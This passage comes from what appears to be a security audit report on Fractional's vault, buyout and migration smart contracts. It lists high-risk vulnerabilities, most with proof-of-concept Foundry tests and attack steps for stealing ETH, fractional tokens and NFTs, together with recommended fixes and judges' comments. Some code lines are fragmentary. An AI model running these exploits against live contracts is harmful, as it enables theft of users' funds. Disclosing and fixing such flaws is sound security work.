fractions from wallet 4) - Wallet 5 -
buyoutShare = (980 * 10 ) / (0 + 980) = 10 ether
(totalSupply = 0
after burning980
fractions from wallet 5)
- Wallet 1 -
If summed up, cashing out the 5 wallets, the attacker receives 22.8 ether
in total. Making a profit of 12.8 ether
This can be repeated and executed with multiple buyouts and vaults at the same time as long as there is Ether left to steal in the Buyout
Decrement ethBalance
from buyout info buyoutInfo[_vault].ethBalance -= buyoutShare;
in Buyout.cash
(see @audit-info
function cash(address _vault, bytes32[] calldata _burnProof) external {
// Reverts if address is not a registered vault
(address token, uint256 id) = IVaultRegistry(registry).vaultToToken(
if (id == 0) revert NotVault(_vault);
// Reverts if auction state is not successful
(, , State current, , uint256 ethBalance, ) = this.buyoutInfo(_vault);
State required = State.SUCCESS;
if (current != required) revert InvalidState(required, current);
// Reverts if caller has a balance of zero fractional tokens
uint256 tokenBalance = IERC1155(token).balanceOf(msg.sender, id);
if (tokenBalance == 0) revert NoFractions();
// Initializes vault transaction
bytes memory data = abi.encodeCall(
(msg.sender, tokenBalance)
// Executes burn of fractional tokens from caller
IVault(payable(_vault)).execute(supply, data, _burnProof);
// Transfers buyout share amount to caller based on total supply
uint256 totalSupply = IVaultRegistry(registry).totalSupply(_vault);
uint256 buyoutShare = (tokenBalance * ethBalance) /
(totalSupply + tokenBalance);
buyoutInfo[_vault].ethBalance -= buyoutShare; // @audit-info decrement `ethBalance` by `buyoutShare`
_sendEthOrWeth(msg.sender, buyoutShare);
// Emits event for cashing out of buyout pool
emit Cash(_vault, msg.sender, buyoutShare);
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
When more than 1 user calls
, users will receive more ETH than expected - leaving a deficit so that later users are unable to access their funds. Agree this is a High risk issue.
Submitted by xiaoming90, also found by 0x52, cccz, codexploder, hyh, kenzo, Lambda, oyc_109, and zzzitron
The following describes the migration process for a vault.
- Assume that Alice is the proposer.
- Alice calls
to propose a set of modules and plugins to migrate a vault to - Other contributors could join a migration proposal by contributing ether and fractional tokens by calling
. - Alice calls
to kick off the buyout process for a migration after the proposal period (7 days) - If the buyout is successful, Alice calls the
to settle a migration. Within this function, a new vault with new set permissions and plugins will be deployed. - Alice calls the
to mint the fractional tokens for a new vault. - Contributors who earlier joined the migration proposal could call the
to migrate their fractional tokens from the old vault to the new vault. - Finally, Alice will call
, and/orMigration.migrateVaultERC1155
to transfer the ERC20, ERC721 (NFT), and/or ERC1155 tokens from the old vault to the new vault.
It was observed that after a successful vault migration, an attacker could Migration.migrateVaultERC20
, Migration.migrateVaultERC721
, and/or Migration.migrateVaultERC1155
with an invalid _proposalId
parameter, causing the assets within the vault to be burned.
The PoC for
, and/orMigration.migrateVaultERC1155
is the same. Thus, only the PoC forMigration.migrateVaultERC721
is shown below, and the PoC formigrateVaultERC20
are omitted for brevity.
Assume that the following:
vault A
holds only one (1) APE ERC721 NFT -
Alice proposes to migrate
vault A
to a new vault, and the buyout is successful. -
Alice proceeds to call
to settle a migration, followed byMigration.settleFractions
to mint the fractional tokens for a new vault. -
An attacker calls
Migration.migrateVaultERC721(vault A, invalid_proposal_id, ape_nft_address, ape_nft_tokenId, erc721TransferProof)
with an invalid proposal ID (proposal ID that does not exist).- Within the
function, thenewVault = migrationInfo[_vault][_proposalId].newVault
will evaluate to zero. This is because the_proposalId
is a non-existent index in themigrationInfo
array, so it will point to an address space that has not been initialised yet. Thus, the valuezero
will be returned, andnewVault
will be set toaddress(0)
- Within the
Next, the
function will attempt to transfer the ERC721 NFT from the old vault (_vault
) to the new vault (newVault
) by callingIBuyout(buyout).withdrawERC721
. SincenewVault
is set toaddress(0)
, this will cause the ERC721 NFT to be sent toaddress(0)
, which effectively burns the NFT.
/// @notice Migrates an ERC-721 token to the new vault after a successful migration
/// @param _vault Address of the vault
/// @param _proposalId ID of the proposal
/// @param _token Address of the ERC-721 token
/// @param _tokenId ID of the token
/// @param _erc721TransferProof Merkle proof for transferring an ERC-721 token
function migrateVaultERC721(
address _vault,
uint256 _proposalId,
address _token,
uint256 _tokenId,
bytes32[] calldata _erc721TransferProof
) external {
address newVault = migrationInfo[_vault][_proposalId].newVault;
// Withdraws an ERC-721 token from the old vault and transfers to the new vault
When a user proposes a migration, the user will kick off the buyout process after the proposal period. The Migration
module will initiate the buyout on behalf of the user. Thus, the proposer of this buyout, in this case, would be the Migration
module. Whenever Buyout.withdrawERC721
function is called, it will verify that msg.sender
is equal to the proposer
to ensure that only the proposer who is the auction winner can migrate the assets from old vault to new vault.
In this example, the attacker has access to Migration.migrateVaultERC20
, Migration.migrateVaultERC721
, and/or Migration.migrateVaultERC1155
functions that effectively instruct the Migration
module to perform the withdrawal. In this case, it will pass the if (msg.sender != proposer) revert NotWinner();
validation within the Buyout.withdrawERC721
because the msg.sender
is the Migration
contract who initiates the buyout at the start.
function IBuyout(buyout).withdrawERC721(
address _vault,
address _token,
address _to,
uint256 _tokenId,
bytes32[] calldata _erc721TransferProof
) external {
// Reverts if address is not a registered vault
(, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
if (id == 0) revert NotVault(_vault);
// Reverts if auction state is not successful
(, address proposer, State current, , , ) = this.buyoutInfo(_vault);
State required = State.SUCCESS;
if (current != required) revert InvalidState(required, current);
// Reverts if caller is not the auction winner
if (msg.sender != proposer) revert NotWinner();
// Initializes vault transaction
bytes memory data = abi.encodeCall(
(_token, _vault, _to, _tokenId)
// Executes transfer of ERC721 token to caller
Yes, it is possible to send NFT to address(0)
If the ERC721 NFT contract uses Openzeppelin's ERC721 contract or Solmate's ERC721 contract, then the NFT cannot be sent to address(0)
because the contracts have implemented validation check to ensure that the to
address is not address(0)
However, not all the ERC721 NFT contracts use Openzeppelin or Solmate ERC721 implementation. Therefore, there will be a large number of custom implementations that allow NFT to be transferred to address(0)
The same theory applies to ERC20 and ERC1155 implementations.
Loss of assets for the users as the assets that they own can be burned by an attacker after a successful migration.
It is recommended to implement additional validation to ensure that the _proposalId
submitted is valid.
Consider checking if newVault
points to a valid vault address before transferring the assets from old vault to new vault.
function migrateVaultERC721(
address _vault,
uint256 _proposalId,
address _token,
uint256 _tokenId,
bytes32[] calldata _erc721TransferProof
) external {
address newVault = migrationInfo[_vault][_proposalId].newVault;
+ if (newVault == address(0)) reverts VaultDoesNotExistOrInvalid;
// Withdraws an ERC-721 token from the old vault and transfers to the new vault
In the above implementation, if anyone attempts to submit an invalid _proposalId
, the newVault
will be set to address(0). The newly implemented validation will detect the abnormal behavior and revert the transaction.
For defense-in-depth, perform additional validation to ensure that the _to
address is not address(0)
within the Buyout.withdrawERC721
function withdrawERC721(
address _vault,
address _token,
address _to,
uint256 _tokenId,
bytes32[] calldata _erc721TransferProof
) external {
// Reverts if address is not a registered vault
(, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
if (id == 0) revert NotVault(_vault);
+ if (_to == 0) revert ToAddressIsZero();
// Reverts if auction state is not successful
(, address proposer, State current, , , ) = this.buyoutInfo(_vault);
State required = State.SUCCESS;
if (current != required) revert InvalidState(required, current);
// Reverts if caller is not the auction winner
if (msg.sender != proposer) revert NotWinner();
// Initializes vault transaction
bytes memory data = abi.encodeCall(
(_token, _vault, _to, _tokenId)
// Executes transfer of ERC721 token to caller
IVault(payable(_vault)).execute(transfer, data, _erc721TransferProof);
The same validation checks should be implemented on migrateVaultERC20
, migrateVaultERC1155
, withdrawERC20
and withdrawERC1155
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
could transfer assets to address(0). ERC721 and 1155 standards require revert when to is address(0), but this is not required by the ERC20 standard. This could be triggered by calling migrate with an invalidproposalId
. Agree this is a High risk issue.Selecting this submission as the primary report for clearly outlining the potential high risk scenario here.
Submitted by infosec_us_team, also found by 0x29A, 0xsanson, berndartmueller, BowTiedWardens, Lambda, MEP, panprog, PwnedNoMore, shenwilly, smiling_heretic, Treasure-Seeker, TrungOre, xiaoming90, and zzzitron
Steal NFTs from a Vault, and ETH + Fractional tokens from users.
The Migration.sol
module expects users to join a proposal using the join
function, and leave a proposal using the leave
function, both functions update fraction and ether balances of the proposal and the caller.
The withdrawContribution
function is meant to be used to retrieve ether and fractions deposited from an unsuccessful migration, but it can be called as well in proposals that have not been commited.
Unfortunately, the withdrawContribution
function will issue a refund on fraction tokens and ether balances the user sent to a proposal but it will not update the variables totalEth
and totalFractions
(as join
and leave
do), leading to an inflation of ETH and fractional tokens if the user calls join
, withdrawContribution
and join
Exploiting this inflation bug, an attacker can steal all Ether and fractional tokens sent to a legit proposal by legit users of the community, and redirect them to an evil proposal that will win (because it has over 51% of token supply) and at the same time invalidate the legit proposal due to:
1- Lack of funds (they were stolen).
2- Only 1 LIVE proposal can be running at the same time.
A key element to take note is that only 1 proposal can be LIVE
, but before a proposal goes LIVE
, many can be created at the same time, and users can join those that resonate with them, sending their ETH and fractional tokens to support it. The vault will have a big amount of ETH and fractional tokens in these situations.
An attacker will exploit the inflation bug as follows:
1- Wait until there's at least 50% of the total supply of fractional tokens in the vault, being stacked into one or several proposals.
2- Create an evil proposal with evil modules and inflate the amount of ETH and fractional tokens in your proposal up to the exact amount of the total ETH and fractional tokens in the vault.
3- Commit your proposal. That will send all ETH and fractional tokens in the vault to your proposal and start
Now that your proposal has over 51% total supply of fractional tokens in it and a lot of ETH stolen from members of the vault, many creative things can be done, including taking over the Vault's NFTs with an evil module once the proposal goes through.
victims can buy tokens to try to stop the proposal from going through, but the price of every tokens is calculated using the depositAmount
and msg.value
(https://github.com/code-423n4/2022-07-fractional/blob/e2c5a962a94106f9495eb96769d7f60f7d5b14c9/src/modules/Buyout.sol#L86) both values manipulated by the attacker.
The proof of concept took 4 hours and 33 mins to be written, as I tried hard to get a clean, and easy to understand and reproducible PoC that illustrates the impact of the attack.
Everything was put inside a function filled with comments at every stage, that can be included within the Unit Tests of the project.
You can read the PoC or include the function in test/Migration.t.sol
and call forge test -vvv --match-test testProposalAttack
to execute it.
function testProposalAttack() public {
initializeMigration(alice, bob, TOTAL_SUPPLY, HALF_SUPPLY, true);
(nftReceiverSelectors, nftReceiverPlugins) = initializeNFTReceiver();
address[] memory modules = new address[](1);
modules[0] = address(mockModule);
// STEP 0
// The attacker waits until a proposal with over 51% joins and a nice amount of ETH is made
// STEP 1
// Alice makes a legit proposal
1 ether
// STEP 3
// Alice joins his proposal with 50 ETH and 5,000 tokens out of a total supply of 10,000
alice.migrationModule.join{value: 50 ether}(vault, 1, 5000);
// NOTE: In a real world scenario, several members will join Alice's legit proposal with their own ETH and tokens,
// but to make this PoC easier to read, instead of creating several fake accounts,
// let's have just Alice join his own proposal with 50% of token supply.
// STEP 4
// Bob makes an evil proposal, with evil modules to steal the vault's NFTs
1 ether
// STEP 5
// Bob joins and then withdraws from the proposal in loop, to inflate the ETH of his proposal
// and total locked tokens (thanks to a bug in the `withdrawContribution` function)
bob.migrationModule.join{value: 10 ether}(vault, 2, 25);
bob.migrationModule.withdrawContribution(vault, 2);
bob.migrationModule.join{value: 10 ether}(vault, 2, 25);
bob.migrationModule.withdrawContribution(vault, 2);
bob.migrationModule.join{value: 10 ether}(vault, 2, 25);
bob.migrationModule.withdrawContribution(vault, 2);
bob.migrationModule.join{value: 10 ether}(vault, 2, 24);
bob.migrationModule.withdrawContribution(vault, 2);
bob.migrationModule.join{value: 10 ether}(vault, 2, 101);
// Let's do some accounting...
(,,uint256 totalEth_AliceProposal,,,,,,) = migrationModule.migrationInfo(vault,1);
(,,uint256 totalEth_BobProposal,uint256 _totalFractions,,,,,) = migrationModule.migrationInfo(vault,2);
// Alice proposal has 50 ETH.
assertEq(totalEth_AliceProposal, 50000000000000000000);
// Bob's proposal has 50 ETH.
assertEq(totalEth_BobProposal, 50000000000000000000);
// He only put 10 ETH, but it shows 50 ETH because
// we inflate it by exploiting the bug.
// We can keep inflating it indefinitely to get any ETH
// amount desired (up to the max ETH balance of the smart contract).
// NOTE that the very REAL ETH Balance of the vault is only the 50 ETH (from Alice) + 10 ETH (from Bob) = 60 ETH.
// We'll steal those 50 ETH from alice and all of his fractional tokens, to add them to our proposal now.
// STEP 6
// Bob calls commit to kickoff the buyout process
bool started = bob.migrationModule.commit(vault, 2);
// Final accounting:
// Buyout now has 5,100 Fraction tokens from a total supply of 10,000 (that's 51% of total supply,
// exactly what is required to win a proposal)
assertEq(getFractionBalance(buyout), 5101);
// and 50 ETH from Alice's proposal
assertEq(getETHBalance(buyout), 50 ether);
// Bob started with 100 ether and at this time it has 90 ether, as we only spent 10 ether
assertEq(getETHBalance(bob.addr), 90 ether);
// Bob only sent 101 tokens from his own fraction balance to his evil proposal, the rest were stolen
// from Alice's proposal
assertEq(getFractionBalance(bob.addr), 4899);
// Next steps are straight forward, you can get creative and do many things that would make the PoC
// unnecessarily long
// Alice's proposal will revert if she tries to commit it, as only 1 proposal can be LIVE
// at the same time. Also, there's not enough ETH in the contract to commit his proposal,
// We are using all of his ETH in our own proposal.
Run forge test -vvv --match-test testProposalAttack
after preparing the testing environment as explained here.
Update the proposal.totalEth
and proposal.totalFractions
in the withdrawContribution
Ferret-san (Fractional) confirmed
HardlyDifficult (judge) commented:
This is a very detailed report! Agree this is a High risk finding.
[H-11] Users can lose fractions to precision loss during migraction if _newFractionSupply is set very low
Submitted by 0x52, also found by 0x29A, hansfriese, and MEP
Precision loss causing loss of user value and potentially cause complete loss to vault.
If the supply of the fraction is set to say 10 then any user that uses migrateFractions
with less than 10% of the contributions will receive no shares at all due to precision loss. Under certain conditions it may even cause complete loss of access to the vault. In this same example, if less than 5 fractions can be redeemed (i.e. not enough people have more than 10% to overcome the precision loss) then the vault would never be able to be bought out and the vault would forever be frozen.
When calling propose require that \_newFractionSupply
is greater than some value (i.e. 1E18).
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
Rounding can lead to loss of assets. Agree with severity.
Submitted by xiaoming90, also found by 0x29A, 0xalpharush, 0xDjango, ayeslick, Critical, infosec_us_team, and Treasure-Seeker
A depositor cannot have any residual allowance after depositing to the vault because the tokens can be stolen by anyone.
Assume that Alice has finished deploying the vault, and she would like to deposit her ERC20, ERC721, and ERC1155 tokens to the vault. She currently holds the following assets in her wallet
XYZ ERC20 tokens- APE #1 ERC721 NFT, APE #2 ERC721 NFT, APE #3 ERC721 NFT,
ABC ERC1155 tokens
Thus, she sets up the necessary approval to grant baseVault
contract the permission to transfer her tokens to the vault.
erc20.approve(address(baseVault), type(uint256).max);
erc721.setApprovalForAll(address(baseVault), true);
erc1155.setApprovalForAll(address(baseVault), true);
Alice decided to deposit 50
XYZ ERC20 tokens, APE #1 ERC721 NFT, and 50
ABC tokens to the vault by calling baseVault.batchDepositERC20
, baseVault.batchDepositERC721
, and baseVault.batchDepositERC1155
as shown below:
baseVault.batchDepositERC20(alice.addr, vault, [XYZ.addr], [50])
baseVault.batchDepositERC721(alice.addr, vault, [APE.addr], [#1])
baseVault.batchDepositERC1155(alice.addr, vault, [ABC.addr], [#1], [50], "")
An attacker notices that there is residual allowance left on the baseVault
, thus the attacker executes the following transactions to steal Alice's assets and send them to the attacker's wallet address.
baseVault.batchDepositERC20(alice.addr, attacker.addr, [XYZ.addr], [950])
baseVault.batchDepositERC721(alice.addr, attacker.addr, [APE.addr, APE.addr], [#2, #3])
baseVault.batchDepositERC1155(alice.addr, attacker.addr, [ABC.addr], [#1], [950], "")
function batchDepositERC20(
address _from,
address _to,
address[] calldata _tokens,
uint256[] calldata _amounts
) external {
for (uint256 i = 0; i < _tokens.length; ) {
IERC20(_tokens[i]).transferFrom(_from, _to, _amounts[i]);
unchecked {
function batchDepositERC721(
address _from,
address _to,
address[] calldata _tokens,
uint256[] calldata _ids
) external {
for (uint256 i = 0; i < _tokens.length; ) {
IERC721(_tokens[i]).safeTransferFrom(_from, _to, _ids[i]);
unchecked {
function batchDepositERC1155(
address _from,
address _to,
address[] calldata _tokens,
uint256[] calldata _ids,
uint256[] calldata _amounts,
bytes[] calldata _datas
) external {
unchecked {
for (uint256 i = 0; i < _tokens.length; ++i) {
Loss of assets for users as a malicious user could utilise the baseVault
contract to exploit the user's residual allowance to steal their assets.
It is recommended to only allow the baseVault.batchDepositERC20
, baseVault.batchDepositERC721
, and baseVault.batchDepositERC1155
functions to pull tokens from the caller (msg.sender
Considering updating the affected functions to remove the from
parameter, and use msg.sender
function batchDepositERC20(
- address _from,
address _to,
address[] calldata _tokens,
uint256[] calldata _amounts
) external {
for (uint256 i = 0; i < _tokens.length; ) {
- IERC20(_tokens[i]).transferFrom(_from, _to, _amounts[i]);
+ IERC20(_tokens[i]).transferFrom(msg.sender, _to, _amounts[i]);
unchecked {
function batchDepositERC721(
- address _from,
address _to,
address[] calldata _tokens,
uint256[] calldata _ids
) external {
for (uint256 i = 0; i < _tokens.length; ) {
- IERC721(_tokens[i]).safeTransferFrom(_from, _to, _ids[i]);
+ IERC721(_tokens[i]).safeTransferFrom(msg.sender, _to, _ids[i]);
unchecked {
function batchDepositERC1155(
- address _from,
address _to,
address[] calldata _tokens,
uint256[] calldata _ids,
uint256[] calldata _amounts,
bytes[] calldata _datas
) external {
unchecked {
for (uint256 i = 0; i < _tokens.length; ++i) {
- _from,
+ msg.sender,
stevennevins (Fractional) confirmed and commented:
Confirmed, we will be addressing this issue!
HardlyDifficult (judge) commented:
Anyone who approved the BaseVault can have their tokens stolen. Agree this is high risk.
Submitted by zzzitron, also found by 0x29A
HIGH - Assets can be compromised directly.
One can drain eth out from migration module to buyout module using custom made FERC1155 token.
The proof of concept shows a scenario where Alice is draining migration module using custom made FERC1155 token.
- Setup: other people are using migration module and they deposited some eth. (using Alice and Bob just to simplify the set up process)
- Alice prepared the custom FERC1155 (let's say
) - Alice create a vault with the
- Alice proposes and joins with 0.5 ether
- When Alice calls
, theevil_token
will reentercommit
and send money to buyout module
Note: For simplicity, the evil_token
reenters for a fixed number of times. But one can adjust to drain all the eth in the migration module.
Note2: For now the eth is in the buyout module, but given the current implementation of buyout
module, the same actor can drain eth from buyout.
The commit
function is not written in Checks, Effects, Interactions (CEI) patterns.
// modules/Migration.sol::commit
// proposal.isCommited and started are set after the out going calls (i.e. start, setApprovalFor)
// Mitigation idea: set the values before the out going calls
206 if (currentPrice > proposal.targetPrice) {
207 // Sets token approval to the buyout contract
208 IFERC1155(token).setApprovalFor(address(buyout), id, true);
209 // Starts the buyout process
210 IBuyout(buyout).start{value: proposal.totalEth}(_vault);
211 proposal.isCommited = true;
212 started = true;
213 }
Follow Checks, Effects, Interactions patterns. One can also consider adding reentrancy guard.
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
The 1155 callback could be used to reentrancy and steal funds. Agree this is high risk.
Submitted by shenwilly, also found by 0x52, codexploder, dipp, kenzo, Lambda, MEP, panprog, smiling_heretic, Treasure-Seeker, TrungOre, xiaoming90, and zzzitron
Funds in migration proposals could potentially be stuck forever if a buyout auction on the same vault is started by other party.
Most of the functions within Migration.sol
can only be executed depending on the state of buyout auction in Buyout.sol
. When there is no buyout happening, a migration proposal can be made and anyone can contribute to the proposal. However, it is possible that a buyout auction is started by another party while a pending proposal is not commited yet.
When this scenario happens, there is no action that could be taken to interact with the pending proposal. All funds that have been contributed cannot be withdrawn. This is because the functions only check for the state of the buyout auction, instead of also considering whether the buyout auction's proposer is Migration.sol
(address token, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
if (id == 0) revert NotVault(_vault);
// Reverts if buyout state is not inactive
(, , State current, , , ) = IBuyout(buyout).buyoutInfo(_vault);
State required = State.INACTIVE;
if (current != required) revert IBuyout.InvalidState(required, current);
Proposal contributors have to wait until the buyout failed before they can withdraw their funds. In case the buyout succeeded, their funds will be stuck forever.
- Bob made a migration proposal and contributed
0.5 eth
. - Alice individually started a buyout auction. Buyout state is now
. - Bob can't leave the proposal.
- Alice successfully ended the buyout auction. Buyout state is now
. - Bob can't withdraw the funds.
Below are the test cases that show the scenarios described above.
function testLeaveBuyoutStarted() public {
initializeMigration(alice, bob, TOTAL_SUPPLY, HALF_SUPPLY, true);
(nftReceiverSelectors, nftReceiverPlugins) = initializeNFTReceiver();
// Migrate to a vault with no permissions (just to test out migration)
address[] memory modules = new address[](1);
modules[0] = address(mockModule);
// Bob makes the proposal
1 ether
// Bob joins the proposal
bob.migrationModule.join{value: 0.5 ether}(vault, 1, HALF_SUPPLY);
// Alice started buyout
alice.buyoutModule.start{value: 1 ether}(vault);
(, , State current, , , ) = alice.buyoutModule.buyoutInfo(vault);
assert(current == State.LIVE);
abi.encodeWithSelector(IBuyout.InvalidState.selector, 0, 1)
// Bob cannot leave
bob.migrationModule.leave(vault, 1);
function testLeaveBuyoutSuccess() public {
// Send Bob a smaller amount so Alice can win the auction
initializeMigration(alice, bob, TOTAL_SUPPLY, HALF_SUPPLY/2, true);
(nftReceiverSelectors, nftReceiverPlugins) = initializeNFTReceiver();
// Migrate to a vault with no permissions (just to test out migration)
address[] memory modules = new address[](1);
modules[0] = address(mockModule);
// Bob makes the proposal
1 ether
// Bob joins the proposal
bob.migrationModule.join{value: 0.5 ether}(vault, 1, HALF_SUPPLY/2);
// Alice did a buyout
alice.buyoutModule.start{value: 1 ether}(vault);
vm.warp(rejectionPeriod + 1);
alice.buyoutModule.end(vault, burnProof);
(, , State current, , , ) = alice.buyoutModule.buyoutInfo(vault);
assert(current == State.SUCCESS);
abi.encodeWithSelector(IBuyout.InvalidState.selector, 0, 2)
// Bob cannot leave
bob.migrationModule.leave(vault, 1);
Modify the checks for the following functions:
So users can withdraw their funds from the proposal when the buyout auction proposer is not Migration.sol
In addition, it's also possible that there are multiple ongoing proposals on the same vault and the buyout is started by one of them. To allow other proposals' contributors to withdraw their fund, consider tracking the latest proposalId
that started the buyout on a vault:
mapping(address => uint256) public latestCommit;
function commit(address _vault, uint256 _proposalId) {
if (currentPrice > proposal.targetPrice) {
latestCommit[_vault] = _proposalId;
For leave
(, address proposer, State current, , , ) = IBuyout(buyout).buyoutInfo(_vault);
// if buyout is started by this proposal, check that state is inactive. Else allow leaving.
if (proposer == address(this) && latestCommit[_vault] == _proposalId) {
State required = State.INACTIVE;
if (current != required) revert IBuyout.InvalidState(required, current);
For withdrawContribution
(, address proposer, State current, , , ) = IBuyout(buyout).buyoutInfo(_vault);
// if buyout is started by this proposal, check that state is inactive. Else allow withdrawing.
if (proposer == address(this) && latestCommit[_vault] == _proposalId) {
State required = State.INACTIVE;
if (current != required) revert IBuyout.InvalidState(required, current);
if (
migrationInfo[_vault][_proposalId].newVault != address(0)
) revert NoContributionToWithdraw();
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
Starting a buyout can cause migration funds to become stuck in the contract. Agree this is High risk.
Selecting this submission as the primary for including POC code and including clear recs.
Submitted by 0x52, also found by hansfriese
Failed proposal can be committed again and eth stolen from migration contract in combination with other vulnerabilities submitted.
Commit can be called as long as it has been less than 7 days from the start time. The buyout period is specified as 4 days in the buyout contract. This means that as long as proposal is committed within 3 days of starting, commit can be called again after a failed buyout (4 days) because the current time will still be less than 7 days from the start time.
This can be used in combination with a vulnerability I previously reported. The contract does not account for the actual number of fractions that it receives back from a failed buyout. If it sent 10 fractions and 3 eth to a buyout it may receive back 15 fractions and 2 eth due to trading against the buyout. Because commit can called again on the same proposal, the second time it will try to send the fraction balance of the contract, now 15, and the value of the eth in the proposal, 3 eth. This transaction will either revert due to not having enough eth or it will send 3 eth pulling from eth deposited to other migration proposals.
This could be exploited by creating a vault and immediately migrating it. Once the migration starts the user could sell fractions to themselves and get eth, making sure to keep the number of fractions under 51%, to prevent a successful buyout. After the buyout fails they can then call the commit function again and more eth will be sent. They can then sell fractions to themselves netting more eth than they initially supplied. This could be done repeatedly until all eth has been stolen from the migration contract.
Change the length of either the migration period or the buyout period to match so that a proposal can't be replayed.
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
Committing a failed proposal multiple times can steal funds from the migration contract. Agree this is High risk.
Making this submission the primary for talking through the potential vulnerability here.
[H-16] migrateFractions
may be called more than once by the same user which may lead to loss of tokens for other users
Submitted by dipp, also found by 0x52, ak1, auditor0517, hansfriese, jonatascm, kenzo, Lambda, panprog, PwnedNoMore, Ruhum, smiling_heretic, Treasure-Seeker, and xiaoming90
The migrateFractions
function in the Migration.sol
contract is used to send new vault tokens to the user calculated based on the amount of ETH and fractions the user contributed to the migration proposal. After it is called once the user should have all the new vault tokens owed to them.
Since the function does not check if the user had already called it, a user may call it more than once, allowing them to gain more new vault tokens than they are owed. If a user repeatedly uses this function to gain new tokens then other users may not be able to get their new tokens.
Test code added to Migrations.t.sol
The test code below shows the first user (Alice) migrating their tokens to the new vault twice before the second user (Bob) calls migrateFractions
which then fails.
function testMigrateFractionsAgain() public {
// Setup
(, , , , address newVault, , , , ) = migrationModule.migrationInfo(
(address newToken, uint256 id) = registry.vaultToToken(newVault);
// First user migrates fractions twice
assertEq(IERC1155(newToken).balanceOf(address(migrationModule), id), TOTAL_SUPPLY * 2); // Confirm Migration has all new tokens
assertEq(getFractionBalance(alice.addr), 4000); // Alice joined with 1 ether and 1000 fractions
alice.migrationModule.migrateFractions(vault, 1);
assertEq(IERC1155(newToken).balanceOf(alice.addr, id), 6000); // Alice's shares == 6000
assertEq(IERC1155(newToken).balanceOf(address(migrationModule), id), TOTAL_SUPPLY * 2 - 6000); // Confirm Migration loses new tokens
alice.migrationModule.migrateFractions(vault, 1);
assertEq(IERC1155(newToken).balanceOf(alice.addr, id), 12000); // Confirm Alice gains 6000 new tokens again
assertEq(IERC1155(newToken).balanceOf(address(migrationModule), id), 8000); // Confirm Migration loses new tokens
// Second user attempts to migrate fractions
assertEq(getFractionBalance(bob.addr), 0); // Bob joined with 1 ether and 5000 fractions (all of his fractions)
bob.migrationModule.migrateFractions(vault, 1); // Bob is unable to call migrateFractions and gain new tokens because the migration module does not contain enough tokens
assertEq(IERC1155(newToken).balanceOf(bob.addr, id), 0); // Confirm Bob does not gain any new tokens (supposed to gain 14,000 tokens)
A possible fix might be to set the userProposalEth
and userProposalFractions
to 0 after the user's tokens have been migrated.
mehtaculous (Fractional) confirmed
HardlyDifficult (judge) increased severity to High and commented:
can be called multiple times, stealing funds from other users. This is a High risk issue.Selecting this submission as the primary for including a clear POC.
[H-17] Proposal which started buyout which fails is able to settle migration as if its buyout succeeded.
Submitted by panprog, also found by 0xsanson, bin2chen, hansfriese, kenzo, PwnedNoMore, smiling_heretic, Treasure-Seeker, and TrungOre
If one proposal starts a buyout which fails, and then another proposal starts a buyout which succeeds, then both of them will be commited and settleVault
can be called on any of them. If it's called on the failed proposal first, then it will settle even though buyout has failed (and it can proceed to withdraw all tokens to a new vault).
Malicious proposal being able to successfully migrate scenario:
- Bob starts a malicious proposal to migrate with a low
, which immediately initiates a buyout - Buyout fails (but malicious proposal is marked as
) - Alice starts a good proposal to migrate, which goes on to buyout which eventually succeeds to get
50%+ fractions
- Alice ends the buyout
- Bob immediately calls
with his malicious proposal - Bob's malicious proposal settles (and he can go on to withdraw all tokens from the vault into his malicious proposal effectively stealing assets from Alice).
Add this code to test/Migration.t.sol
function testPanprogBugH3() public {
initializeMigration(alice, bob, 10000, 4000, true);
(nftReceiverSelectors, nftReceiverPlugins) = initializeNFTReceiver();
// Migrate to a vault with no permissions (just to test out migration)
address[] memory newModules = new address[](2);
newModules[0] = migration;
newModules[1] = modules[1];
// Bob makes the proposal
1 ether
// Bob joins the proposal with 4000 fractions
bob.migrationModule.join{value: 1 ether}(vault, 1, 4000);
// since the target price is reached, bob starts the buyout
bob.migrationModule.commit(vault, 1);
vm.warp(rejectionPeriod + 1);
// after buyout fails, bob ends it
// note: bob's proposal is still commited even though it has failed
bob.buyoutModule.end(vault, burnProof);
bob.migrationModule.withdrawContribution(vault, 1);
// Alice makes a different proposal (we use bob's data for simplicity)
1 ether
// Alice joins the proposal with 6000 fractions
alice.migrationModule.join{value: 1 ether}(vault, 2, 6000);
// since the target price is reached, alice starts the buyout
alice.migrationModule.commit(vault, 2);
vm.warp(proposalPeriod * 10);
// after buyout succeeds (as it has >50% of fractions), alice ends it
// note: both bob's and alice's proposals are commited at this point
alice.buyoutModule.end(vault, burnProof);
// Now bob (whose buyout has failed) settles his proposal
// It should revert, but it succeeds
bob.migrationModule.settleVault(vault, 2);
Add a new storage variable for currently active proposal id. Allow calling settleVault
only for active proposal id (and also only if buyout's proposer equals Migration
address, otherwise there can be a different successful buyout not connected to the active proposal). Also add appropriate checks with active proposal in the other functions as well (don't allow to commit if there is an active proposal etc).
Ferret-san (Fractional) confirmed
HardlyDifficult (judge) commented:
A failed migration can settle after a successful buyout. Agree this is High risk.
Selecting this submission as the primary for including a clear coded POC.
[H-18] The time constraint of selling fractions can be bypassed by directly transferring fraction tokens to the buyout contract
Submitted by PwnedNoMore, also found by Treasure-Seeker
The end
function in the Buyout
contract uses IERC1155(token).balanceOf(address(this), id)
to determine the amount of deposited fraction tokens without distinguishing whether those fraction tokens are depositied by the sellFractions
function or by direct transferring. Note that only the sellFractions
function is constrained by PROPOSAL_PERIOD
This vulnerability lets a 51-holder gain the whole batch of NFTs without paying for the rest 49% fractions.
Assume a vault X creates 100 fraction tokens and the market-decided price of a fraction token is 1 ether (i.e., the ideal value of the locked NFTs in vault X is 100 ether). Let's also assume that Alice holds 51 tokens (maybe by paying 51 ether on opensea).
Followings are two scenarios, where the benign one follows the normal workflow and the malicious one exploits the vulnerability.
- Alice starts a buyout by depositing her 51 fraction tokens and 49 ether, making the
1 ether - Other users are satisfied with the provided price, and hence no one buys or sells their fraction tokens
- The buyout succeeds:
- Alice gets the locked NFTs
- Other fraction holders can invoke
to redeem their fraction tokens with a price of 1 ether
- As a result, Alice paid 100 ether in total to get the locked NFTs.
- Alice starts a buyout by depositing 0 fraction tokens and 1 wei, making the
